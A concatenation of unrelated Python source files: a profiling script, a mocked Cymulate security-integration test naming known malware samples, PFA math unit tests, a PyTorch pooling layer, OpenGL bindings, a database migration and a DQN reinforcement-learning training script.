from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
from line_profiler import LineProfiler
import numpy as np
from utility import ols_lstsq, ols_sklearn
# We learn that
#https://github.com/scikit-learn/scikit-learn/blob/1495f6924/sklearn/linear_model/base.py#L438
# LinearRegression.fit is expensive because
# of calls to check_X_y, _preprocess_data and linalg.lstsq
# https://github.com/scikit-learn/scikit-learn/blob/1495f6924/sklearn/linear_model/base.py#L101
# _preprocess_data
# has 3 expensive lines - check_array, np.asarray, np.average
#https://github.com/scikit-learn/scikit-learn/blob/1495f69242646d239d89a5713982946b8ffcf9d9/sklearn/utils/validation.py#L600
# check_X_y
# checks for array for certain characteristics and lengths
#
df = pd.read_pickle('generated_ols_data.pickle')
print(f"Loaded {df.shape} rows")
est = LinearRegression()
row = df.iloc[0]
X = np.arange(row.shape[0]).reshape(-1, 1).astype(np.float_)
lp = LineProfiler(est.fit)
print("Run on a single row")
lp.run("est.fit(X, row.values)")
lp.print_stats()
print("Run on 5000 rows")
lp.run("df[:5000].apply(ols_sklearn, axis=1)")
lp.print_stats()
lp = LineProfiler(base._preprocess_data)
lp.run("base._preprocess_data(X, row, fit_intercept=True)")
lp.print_stats()
lp = LineProfiler(base.check_X_y)
lp.run("base.check_X_y(X, y, accept_sparse=['csr', 'csc', 'coo'], y_numeric=True, multi_output=True)")
lp.print_stats()
#%lprun -f est_diagnosis.fit est_diagnosis.fit(np.arange(rowx.shape[0]).reshape(-1, 1), rowx.values)
#lp.run("est_diagnosis.fit(np.arange(rowx.shape[0]).reshape(-1, 1).astype(np.float_), y.values)")
#lp.run("base._preprocess_data(np.arange(rowx.shape[0]).reshape(-1, 1).astype(np.float_), rowx, fit_intercept=True)")
|
pyBN/inference/__init__.py | seuzmj/pyBN | 126 | 12670113 | from pyBN.inference.map_exact import *
from pyBN.inference.marginal_approx import *
from pyBN.inference.marginal_exact import * |
Packs/Cymulate/Integrations/Cymulate/Cymulate_test.py | diCagri/content | 799 | 12670122 | import demistomock as demisto
from Cymulate import cymulate_test, fetch_incidents, cymulate_get_incident_info, Client, CymulateModuleTypeEnum
BASE_URL = 'https://api.cymulate.com/v1/'
MOKE_TEST = {"success": True, "data": ["Phishing Awareness", "Web Application Firewall",
"Lateral Movement", "Data Exfiltration",
"Immediate Threats Intelligence", "Email Gateway",
"Endpoint Security", "Web Gateway", "Full Kill-Chain APT"]}
FETCH_INCIDENTS_TEST = {"success": True,
"data": [
{
"Id": "5dbeaf53a910862fa859491e",
"Name": " Ursnif infection with Dridex and Powershell Empire",
"Timestamp": "03/11/2019 05:43:31",
"InProgress": False
},
{
"Id": "5dbea88c357ca849ac41bb2e",
"Name": "Pcap and malware for an ISC diary (Emotet + Trickbot)",
"Timestamp": "03/11/2019 05:14:36",
"InProgress": False
},
{
"Id": "5d528f78705e364e9055033c",
"Name": "BlackSquid Drops XMRig Miner",
"Timestamp": "13/08/2019 06:22:48",
"InProgress": False
},
{
"Id": "5d25dc5d86d73c22203d919f",
"Name": "dll2",
"Timestamp": "10/07/2019 08:38:53",
"InProgress": False
},
{
"Id": "5cc7109ca842693cc0f15588",
"Name": "hot files test 8",
"Timestamp": "29/04/2019 10:56:28",
"InProgress": False
},
{
"Id": "5c8e6cbf3dd9fe08186d7b64",
"Name": "Hancitor malspam infections from 2018-08-13 and 2018-08-14",
"Timestamp": "17/03/2019 11:50:23",
"InProgress": False
}
]
}
CYMULATE_GET_INCIDENT_INFO_TEST = {"success": True,
"data": [
{
"Module": "Immediate Threats Intelligence",
"Penetration_Vector": "-",
"Attack_Payload": "2019-07-08-Ursnif-binary-retrieved-by-Word-macro_"
"2b999360-a3f9-11e9-980e-633d1efd31f3.exe",
"Name": " Ursnif infection with Dridex and Powershell Empire",
"Timestamp": "03/11/2019 05:45:47",
"Sha1": "ff57bfaed6db3379bbf69a19404a6e21668a7a52",
"Sha256": "0894e82d9397d909099c98fe186354591ae86a73230700f462b72ae36c700ddf",
"Md5": "ef99338df4078fab6e9a8cf6797a1d14",
"Status": "Penetrated",
"Attack_Vector": "Endpoint Security",
"Attack_Type": "Antivirus",
"Mitigation": "N/A",
"Description": "N/A",
"ID": "c1d33138a2101724889862152444ec7e",
"Related_URLS": "N/A",
"Related_Email_Addresses": "N/A"
}
]
}
TECHNICAL_INCIDENTS_IDS = ['5dbeaf53a910862fa859491e', '5dbea88c357ca849ac41bb2e', '5d528f78705e364e9055033c',
'5d25dc5d86d73c22203d919f', '5cc7109ca842693cc0f15588', '5c8e6cbf3dd9fe08186d7b64']
MOCK_TIMESTAMP = "2020-12-02T16%3A32%3A37"
ATTACK_ID = "5dbeaf53a910862fa859491e"
def local_get_last_run():
return {}
def test_test_client(requests_mock):
requests_mock.get(BASE_URL + 'user/modules', json=MOKE_TEST)
client = Client(
base_url=BASE_URL,
headers={"x-token": '<PASSWORD>'},
verify=False)
cymulate_test(client=client, is_fetch=False)
def test_fetch_incidents(mocker, requests_mock):
requests_mock.get(BASE_URL + 'immediate-threats/ids?from={}'.format(MOCK_TIMESTAMP),
json=FETCH_INCIDENTS_TEST)
for incident_id in TECHNICAL_INCIDENTS_IDS:
requests_mock.get(BASE_URL + 'immediate-threats/attack/technical/' + incident_id,
json=CYMULATE_GET_INCIDENT_INFO_TEST)
mocker.patch.object(demisto, 'params',
return_value={'fetch_time': MOCK_TIMESTAMP})
mocker.patch.object(demisto, 'getLastRun', side_effect=local_get_last_run)
client = Client(
base_url=BASE_URL,
headers={"x-token": '<PASSWORD>'},
verify=False)
next_run, incidents, remain_incidents = fetch_incidents(client=client,
module_type=CymulateModuleTypeEnum.IMMEDIATE_THREATS,
last_run={'last_fetch': '2020-12-02T16:32:37'},
first_fetch_time={},
only_penatrated=False,
limit=20,
integration_context=None)
assert len(incidents) == 6
def test_cymulate_get_incident_info(mocker, requests_mock):
mocker.patch.object(demisto, 'args', return_value={"module_type": CymulateModuleTypeEnum.IMMEDIATE_THREATS.name,
"attack_id": ATTACK_ID})
requests_mock.get(BASE_URL + 'immediate-threats/attack/technical/' + ATTACK_ID,
json=CYMULATE_GET_INCIDENT_INFO_TEST)
client = Client(
base_url=BASE_URL,
headers={"x-token": '<PASSWORD>'},
verify=False)
# Get incident's parent id
attack_id = demisto.args().get('attack_id')
technical_info = cymulate_get_incident_info(client=client, attack_id=attack_id)
assert(technical_info[0]['ID'] == CYMULATE_GET_INCIDENT_INFO_TEST['data'][0]['ID'])
|
titus/test/lib/testMath.py | jmilleralpine/hadrian | 127 | 12670138 | <gh_stars>100-1000
#!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from titus.genpy import PFAEngine
from titus.errors import *
class TestLib1Math(unittest.TestCase):
def testProvideConstants(self):
engine, = PFAEngine.fromYaml('''
input: "null"
output: double
action:
- {m.pi: []}
''')
self.assertAlmostEqual(engine.action(None), 3.141592653589793, places=14)
engine, = PFAEngine.fromYaml('''
input: "null"
output: double
action:
- {m.e: []}
''')
self.assertAlmostEqual(engine.action(None), 2.718281828459045, places=14)
def testDoAbs(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.abs: input}
''')
self.assertAlmostEqual(engine.action(-3.14), 3.14, places=2)
engine, = PFAEngine.fromYaml('''
input: int
output: int
action:
- {m.abs: input}
''')
self.assertEqual(engine.action(2147483647), 2147483647)
self.assertEqual(engine.action(-2147483647), 2147483647)
self.assertRaises(PFARuntimeException, lambda: engine.action(-2147483648))
engine, = PFAEngine.fromYaml('''
input: long
output: long
action:
- {m.abs: input}
''')
self.assertEqual(engine.action(9223372036854775807), 9223372036854775807)
self.assertEqual(engine.action(-9223372036854775807), 9223372036854775807)
self.assertRaises(PFARuntimeException, lambda: engine.action(-9223372036854775808))
def testDoAcos(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.acos: input}
''')
self.assertEqual(str(engine.action(-10)), "nan")
self.assertAlmostEqual(engine.action(-1), 3.14, places=2)
self.assertAlmostEqual(engine.action(-0.8), 2.50, places=2)
self.assertAlmostEqual(engine.action(0), 1.57, places=2)
self.assertAlmostEqual(engine.action(0.8), 0.64, places=2)
self.assertAlmostEqual(engine.action(1), 0.00, places=2)
def testDoAsin(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.asin: input}
''')
self.assertEqual(str(engine.action(-10)), "nan")
self.assertAlmostEqual(engine.action(-1), -1.57, places=2)
self.assertAlmostEqual(engine.action(-0.8), -0.93, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.8), 0.93, places=2)
self.assertAlmostEqual(engine.action(1), 1.57, places=2)
def testDoAtan(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.atan: input}
''')
self.assertAlmostEqual(engine.action(-1), -0.79, places=2)
self.assertAlmostEqual(engine.action(-0.8), -0.67, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.8), 0.67, places=2)
self.assertAlmostEqual(engine.action(1), 0.79, places=2)
def testDoAtan2(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.atan2: [input, 1]}
''')
self.assertAlmostEqual(engine.action(-1), -0.79, places=2)
self.assertAlmostEqual(engine.action(-0.8), -0.67, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.8), 0.67, places=2)
self.assertAlmostEqual(engine.action(1), 0.79, places=2)
def testCeil(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.ceil: input}
''')
self.assertEqual(engine.action(-3.2), -3)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 4)
def testCopysign(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.copysign: [5, input]}
''')
self.assertEqual(engine.action(-3.2), -5)
self.assertEqual(engine.action(0), 5)
self.assertEqual(engine.action(3.2), 5)
def testCos(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.cos: input}
''')
self.assertAlmostEqual(engine.action(-22.5), -0.87, places=2)
self.assertAlmostEqual(engine.action(-0.5), 0.88, places=2)
self.assertAlmostEqual(engine.action(0), 1.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.88, places=2)
self.assertAlmostEqual(engine.action(22.5), -0.87, places=2)
def testCosh(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.cosh: input}
''')
self.assertAlmostEqual(engine.action(-22.5), 2955261031.51, places=2)
self.assertAlmostEqual(engine.action(-0.5), 1.13, places=2)
self.assertAlmostEqual(engine.action(0), 1.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 1.13, places=2)
self.assertAlmostEqual(engine.action(22.5), 2955261031.51, places=2)
def testExp(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.exp: input}
''')
self.assertAlmostEqual(engine.action(-22.5), 0.00, places=2)
self.assertAlmostEqual(engine.action(-0.5), 0.61, places=2)
self.assertAlmostEqual(engine.action(0), 1.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 1.65, places=2)
self.assertAlmostEqual(engine.action(22.5), 5910522063.02, places=2)
def testExpm1(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.expm1: input}
''')
self.assertAlmostEqual(engine.action(-22.5), -1.00, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.39, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.65, places=2)
self.assertAlmostEqual(engine.action(22.5), 5910522062.02, places=2)
def testFloor(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.floor: input}
''')
self.assertEqual(engine.action(-3.2), -4)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 3)
def testHypot(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.hypot: [input, 3.5]}
''')
self.assertAlmostEqual(engine.action(-22.5), 22.77, places=2)
self.assertAlmostEqual(engine.action(-0.5), 3.54, places=2)
self.assertAlmostEqual(engine.action(0), 3.50, places=2)
self.assertAlmostEqual(engine.action(0.5), 3.54, places=2)
self.assertAlmostEqual(engine.action(22.5), 22.77, places=2)
def testLn(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.ln: input}
''')
self.assertEqual(str(engine.action(-1)), "nan")
self.assertEqual(str(engine.action(0)), "-inf")
self.assertAlmostEqual(engine.action(0.00001), -11.51, places=2)
self.assertAlmostEqual(engine.action(0.5), -0.69, places=2)
self.assertAlmostEqual(engine.action(22.5), 3.11, places=2)
def testLog10(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.log10: input}
''')
self.assertEqual(str(engine.action(-1)), "nan")
self.assertEqual(str(engine.action(0)), "-inf")
self.assertAlmostEqual(engine.action(0.00001), -5.00, places=2)
self.assertAlmostEqual(engine.action(0.5), -0.30, places=2)
self.assertAlmostEqual(engine.action(22.5), 1.35, places=2)
def testArbitraryBaseLog(self):
engine, = PFAEngine.fromYaml('''
input: int
output: double
action:
- {m.log: [5.5, input]}
''')
self.assertAlmostEqual(engine.action(2), 2.46, places=2)
self.assertAlmostEqual(engine.action(5), 1.06, places=2)
self.assertAlmostEqual(engine.action(10), 0.74, places=2)
self.assertAlmostEqual(engine.action(16), 0.61, places=2)
self.assertRaises(PFARuntimeException, lambda: engine.action(0))
self.assertRaises(PFARuntimeException, lambda: engine.action(-1))
def testLn(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.ln1p: input}
''')
self.assertEqual(str(engine.action(-2)), "nan")
self.assertEqual(str(engine.action(-1)), "-inf")
self.assertAlmostEqual(engine.action(-0.99999), -11.51, places=2)
self.assertAlmostEqual(engine.action(-0.99999), -11.51, places=2)
self.assertAlmostEqual(engine.action(0.0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.00001), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.41, places=2)
self.assertAlmostEqual(engine.action(22.5), 3.16, places=2)
def testRound(self):
engine, = PFAEngine.fromYaml('''
input: double
output: long
action:
- {m.round: input}
''')
self.assertEqual(engine.action(-3.8), -4)
self.assertEqual(engine.action(-3.5), -3)
self.assertEqual(engine.action(-3.2), -3)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 3)
self.assertEqual(engine.action(3.5), 4)
self.assertEqual(engine.action(3.8), 4)
self.assertEqual(engine.action(9.223372036800000e+18), 9223372036800000000)
self.assertRaises(PFARuntimeException, lambda: engine.action(9.223372036854777e+18))
self.assertEqual(engine.action(-9.223372036854776e+18), -9223372036854775808)
self.assertRaises(PFARuntimeException, lambda: engine.action(-9.223372036854777e+18))
def testRint(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.rint: input}
''')
self.assertEqual(engine.action(-3.8), -4)
self.assertEqual(engine.action(-3.5), -4)
self.assertEqual(engine.action(-3.2), -3)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 3)
self.assertEqual(engine.action(3.5), 4)
self.assertEqual(engine.action(3.8), 4)
def testSignum(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.signum: input}
''')
self.assertEqual(engine.action(-3.2), -1)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 1)
self.assertEqual(engine.action(1.0), 1)
def testSin(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.sin: input}
''')
self.assertAlmostEqual(engine.action(-22.5), 0.49, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.48, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.48, places=2)
self.assertAlmostEqual(engine.action(22.5), -0.49, places=2)
def testSinh(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.sinh: input}
''')
self.assertAlmostEqual(engine.action(-22.5), -2955261031.51, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.52, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.52, places=2)
self.assertAlmostEqual(engine.action(22.5), 2955261031.51, places=2)
def testSqrt(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.sqrt: input}
''')
self.assertEqual(str(engine.action(-1)), "nan")
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.71, places=2)
self.assertAlmostEqual(engine.action(22.5), 4.74, places=2)
def testTan(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.tan: input}
''')
self.assertAlmostEqual(engine.action(-10.5), -1.85, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.55, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.55, places=2)
self.assertAlmostEqual(engine.action(10.5), 1.85, places=2)
def testTanh(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.tanh: input}
''')
self.assertAlmostEqual(engine.action(-22.5), -1.00, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.46, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.46, places=2)
self.assertAlmostEqual(engine.action(22.5), 1.00, places=2)
# def testErf(self):
# engine, = PFAEngine.fromYaml('''
# input: double
# output: double
# action:
# - {m.special.erf: input}
# ''')
# self.assertAlmostEqual(engine.action(-22.5), -1.00, places=2)
# self.assertAlmostEqual(engine.action(-0.5), -0.52, places=2)
# self.assertAlmostEqual(engine.action(0), 0.00, places=2)
# self.assertAlmostEqual(engine.action(0.5), 0.52, places=2)
# self.assertAlmostEqual(engine.action(22.5), 1.00, places=2)
if __name__ == "__main__":
unittest.main()
|
nmtpytorch/layers/pool.py | tejas1995/nmtpytorch | 420 | 12670144 | import torch
class Pool(torch.nn.Module):
"""A pool layer with mean/max/sum/last options."""
def __init__(self, op_type, pool_dim, keepdim=True):
super().__init__()
self.op_type = op_type
self.pool_dim = pool_dim
self.keepdim = keepdim
assert self.op_type in ["last", "mean", "max", "sum"], \
"Pool() operation should be mean, max, sum or last."
if self.op_type == 'last':
self.__pool_fn = lambda x: x.select(
self.pool_dim, -1).unsqueeze(0)
else:
if self.op_type == 'max':
self.__pool_fn = lambda x: torch.max(
x, dim=self.pool_dim, keepdim=self.keepdim)[0]
elif self.op_type == 'mean':
self.__pool_fn = lambda x: torch.mean(
x, dim=self.pool_dim, keepdim=self.keepdim)
elif self.op_type == 'sum':
self.__pool_fn = lambda x: torch.sum(
x, dim=self.pool_dim, keepdim=self.keepdim)
def forward(self, x):
return self.__pool_fn(x)
def __repr__(self):
return "Pool(op_type={}, pool_dim={}, keepdim={})".format(
self.op_type, self.pool_dim, self.keepdim)
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/APPLE/vertex_array_range.py | ShujaKhalid/deep-rl | 210 | 12670162 | <reponame>ShujaKhalid/deep-rl<gh_stars>100-1000
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_APPLE_vertex_array_range'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_APPLE_vertex_array_range',error_checker=_errors._error_checker)
GL_STORAGE_CACHED_APPLE=_C('GL_STORAGE_CACHED_APPLE',0x85BE)
GL_STORAGE_CLIENT_APPLE=_C('GL_STORAGE_CLIENT_APPLE',0x85B4)
GL_STORAGE_SHARED_APPLE=_C('GL_STORAGE_SHARED_APPLE',0x85BF)
GL_VERTEX_ARRAY_RANGE_APPLE=_C('GL_VERTEX_ARRAY_RANGE_APPLE',0x851D)
GL_VERTEX_ARRAY_RANGE_LENGTH_APPLE=_C('GL_VERTEX_ARRAY_RANGE_LENGTH_APPLE',0x851E)
GL_VERTEX_ARRAY_RANGE_POINTER_APPLE=_C('GL_VERTEX_ARRAY_RANGE_POINTER_APPLE',0x8521)
GL_VERTEX_ARRAY_STORAGE_HINT_APPLE=_C('GL_VERTEX_ARRAY_STORAGE_HINT_APPLE',0x851F)
@_f
@_p.types(None,_cs.GLsizei,ctypes.c_void_p)
def glFlushVertexArrayRangeAPPLE(length,pointer):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glVertexArrayParameteriAPPLE(pname,param):pass
@_f
@_p.types(None,_cs.GLsizei,ctypes.c_void_p)
def glVertexArrayRangeAPPLE(length,pointer):pass
|
lemur/migrations/versions/4fe230f7a26e_.py | dck25/lemur | 1,656 | 12670175 | """Add 'ports' column to certificate_associations table
Revision ID: 4fe230f7a26e
Revises: <KEY>
Create Date: 2021-05-07 10:57:16.964743
"""
# revision identifiers, used by Alembic.
revision = '4fe230f7a26e'
down_revision = '<KEY>'
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
def upgrade():
# Add the "ports" column
op.add_column('certificate_associations', sa.Column('ports', postgresql.ARRAY(sa.Integer()), nullable=True))
# Make the existing foreign key columns non-nullable
op.alter_column('certificate_associations', 'domain_id',
existing_type=sa.INTEGER(),
nullable=False)
op.alter_column('certificate_associations', 'certificate_id',
existing_type=sa.INTEGER(),
nullable=False)
def downgrade():
# Make the existing foreign key columns nullable
op.alter_column('certificate_associations', 'certificate_id',
existing_type=sa.INTEGER(),
nullable=True)
op.alter_column('certificate_associations', 'domain_id',
existing_type=sa.INTEGER(),
nullable=True)
# Drop the "ports" column
op.drop_column('certificate_associations', 'ports')
|
train_DQN_script.py | gordicaleksa/pytorch-learn-reinforcement-learning | 102 | 12670183 | """
Implementation of the original DQN Nature paper:
https://storage.googleapis.com/deepmind-media/dqn/DQNNaturePaper.pdf
Some of the complexity is captured via wrappers but the main components such as the DQN model itself,
the training loop, the memory-efficient replay buffer are implemented from scratch.
Some modifications:
* Using Adam instead of RMSProp
"""
import os
import argparse
import time
import copy
import numpy as np
import torch
from torch import nn
import matplotlib.pyplot as plt
from torch.optim import Adam
from torch.utils.tensorboard import SummaryWriter
import utils.utils as utils
from utils.replay_buffer import ReplayBuffer
from utils.constants import *
from models.definitions.DQN import DQN
class ActorLearner:
def __init__(self, config, env, replay_buffer, dqn, target_dqn, last_frame):
self.start_time = time.time()
self.config = config
self.env = env
self.last_frame = last_frame # always keeps the latest frame from the environment
self.replay_buffer = replay_buffer
# DQN Models
self.dqn = dqn
self.target_dqn = target_dqn
# Logging/debugging-related
self.debug = config['debug']
self.log_freq = config['log_freq']
self.episode_log_freq = config['episode_log_freq']
self.grads_log_freq = config['grads_log_freq']
self.checkpoint_freq = config['checkpoint_freq']
self.tensorboard_writer = SummaryWriter()
self.huber_loss = []
self.best_episode_reward = -np.inf
self.best_dqn_model = None # keeps a deep copy of the best DQN model so far (best = highest episode reward)
# MSE/L2 between [-1,1] and L1 otherwise (as stated in the Nature paper) aka "Huber loss"
self.loss = nn.SmoothL1Loss()
self.optimizer = Adam(self.dqn.parameters(), lr=config['learning_rate'])
self.grad_clip_value = config['grad_clipping_value']
self.acting_learning_step_ratio = config['acting_learning_step_ratio']
self.num_warmup_steps = config['num_warmup_steps']
self.batch_size = config['batch_size']
self.gamma = config['gamma'] # discount factor
self.learner_cnt = 0
self.target_dqn_update_interval = config['target_dqn_update_interval']
# should perform a hard or a soft update of target DQN weights
self.tau = config['tau']
def collect_experience(self):
# We're collecting more experience than we're doing weight updates (4x in the Nature paper)
for _ in range(self.acting_learning_step_ratio):
last_index = self.replay_buffer.store_frame(self.last_frame)
state = self.replay_buffer.fetch_last_state() # state = 4 preprocessed last frames for Atari
action = self.sample_action(state)
new_frame, reward, done_flag, _ = self.env.step(action)
self.replay_buffer.store_action_reward_done(last_index, action, reward, done_flag)
if done_flag:
new_frame = self.env.reset()
self.maybe_log_episode()
self.last_frame = new_frame
if self.debug:
self.visualize_state(state)
self.env.render()
self.maybe_log()
def sample_action(self, state):
if self.env.get_total_steps() < self.num_warmup_steps:
action = self.env.action_space.sample() # initial warm up period - no learning, acting randomly
else:
with torch.no_grad():
action = self.dqn.epsilon_greedy(state)
return action
def get_number_of_env_steps(self):
return self.env.get_total_steps()
def learn_from_experience(self):
current_states, actions, rewards, next_states, done_flags = self.replay_buffer.fetch_random_states(self.batch_size)
# Better than detaching: in addition to target dqn not being a part of the computational graph it also
# saves time/memory because we're not storing activations during forward propagation needed for the backprop
with torch.no_grad():
# shape = (B, NA) -> (B, 1), where NA - number of actions
# [0] because max returns (values, indices) tuples
next_state_max_q_values = self.target_dqn(next_states).max(dim=1, keepdim=True)[0]
# shape = (B, 1), TD targets. We need (1 - done) because when we're in a terminal state the next
# state Q value should be 0 and we only use the reward information
target_q_values = rewards + (1 - done_flags) * self.gamma * next_state_max_q_values
# shape = (B, 1), pick those Q values that correspond to the actions we made in those states
current_state_q_values = self.dqn(current_states).gather(dim=1, index=actions)
loss = self.loss(target_q_values, current_state_q_values)
self.huber_loss.append(loss.item())
self.optimizer.zero_grad()
loss.backward() # compute the gradients
if self.grad_clip_value is not None: # potentially clip gradients for stability reasons
nn.utils.clip_grad_norm_(self.dqn.parameters(), self.grad_clip_value)
self.optimizer.step() # update step
self.learner_cnt += 1
# Periodically update the target DQN weights (coupled to the number of DQN weight updates and not # env steps)
if self.learner_cnt % self.target_dqn_update_interval == 0:
if self.tau == 1.:
print('Update target DQN (hard update)')
self.target_dqn.load_state_dict(self.dqn.state_dict())
else: # soft update, the 2 branches can be merged together, leaving it like this for now
raise Exception(f'Soft update is not yet implemented (hard update was used in the original paper)')
@staticmethod
def visualize_state(state):
state = state[0].to('cpu').numpy() # (1/B, C, H, W) -> (C, H, W)
stacked_frames = np.hstack([np.repeat((img * 255).astype(np.uint8)[:, :, np.newaxis], 3, axis=2) for img in state]) # (C, H, W) -> (H, C*W, 3)
plt.imshow(stacked_frames)
plt.show()
def maybe_log_episode(self):
rewards = self.env.get_episode_rewards() # we can do this thanks to the Monitor wrapper
episode_lengths = self.env.get_episode_lengths()
num_episodes = len(rewards)
if self.episode_log_freq is not None and num_episodes % self.episode_log_freq == 0:
self.tensorboard_writer.add_scalar('Rewards per episode', rewards[-1], num_episodes)
self.tensorboard_writer.add_scalar('Steps per episode', episode_lengths[-1], num_episodes)
if rewards[-1] > self.best_episode_reward:
self.best_episode_reward = rewards[-1]
self.config['best_episode_reward'] = self.best_episode_reward # metadata
self.best_dqn_model = copy.deepcopy(self.dqn) # keep track of the model that gave the best reward
def maybe_log(self):
num_steps = self.env.get_total_steps()
if self.log_freq is not None and num_steps > 0 and num_steps % self.log_freq == 0:
self.tensorboard_writer.add_scalar('Epsilon', self.dqn.epsilon_value(), num_steps)
if len(self.huber_loss) > 0:
self.tensorboard_writer.add_scalar('Huber loss', np.mean(self.huber_loss), num_steps)
self.tensorboard_writer.add_scalar('FPS', num_steps / (time.time() - self.start_time), num_steps)
self.huber_loss = [] # clear the loss values and start recollecting them again
# Periodically save DQN models
if self.checkpoint_freq is not None and num_steps > 0 and num_steps % self.checkpoint_freq == 0:
ckpt_model_name = f'dqn_{self.config["env_id"]}_ckpt_steps_{num_steps}.pth'
torch.save(utils.get_training_state(self.config, self.dqn), os.path.join(CHECKPOINTS_PATH, ckpt_model_name))
# Log the gradients
if self.grads_log_freq is not None and self.learner_cnt > 0 and self.learner_cnt % self.grads_log_freq == 0:
total_grad_l2_norm = 0
for cnt, (name, weight_or_bias_parameters) in enumerate(self.dqn.named_parameters()):
grad_l2_norm = weight_or_bias_parameters.grad.data.norm(p=2).item()
self.tensorboard_writer.add_scalar(f'grad_norms/{name}', grad_l2_norm, self.learner_cnt)
total_grad_l2_norm += grad_l2_norm ** 2
# As if we concatenated all of the params into a single vector and took L2
total_grad_l2_norm = total_grad_l2_norm ** (1/2)
self.tensorboard_writer.add_scalar(f'grad_norms/total', total_grad_l2_norm, self.learner_cnt)
def log_to_console(self): # keep it minimal for now, I mostly use tensorboard - feel free to expand functionality
print(f'Number of env steps = {self.get_number_of_env_steps()}')
def train_dqn(config):
env = utils.get_env_wrapper(config['env_id'])
replay_buffer = ReplayBuffer(config['replay_buffer_size'], crash_if_no_mem=config['dont_crash_if_no_mem'])
utils.set_random_seeds(env, config['seed'])
linear_schedule = utils.LinearSchedule(
config['epsilon_start_value'],
config['epsilon_end_value'],
config['epsilon_duration']
)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
dqn = DQN(env, number_of_actions=env.action_space.n, epsilon_schedule=linear_schedule).to(device)
target_dqn = DQN(env, number_of_actions=env.action_space.n).to(device)
# Don't get confused by the actor-learner terminology, DQN is not an actor-critic method, but conceptually
# we can split the learning process into collecting experience/acting in the env and learning from that experience
actor_learner = ActorLearner(config, env, replay_buffer, dqn, target_dqn, env.reset())
while actor_learner.get_number_of_env_steps() < config['num_of_training_steps']:
num_env_steps = actor_learner.get_number_of_env_steps()
if config['console_log_freq'] is not None and num_env_steps % config['console_log_freq'] == 0:
actor_learner.log_to_console()
actor_learner.collect_experience()
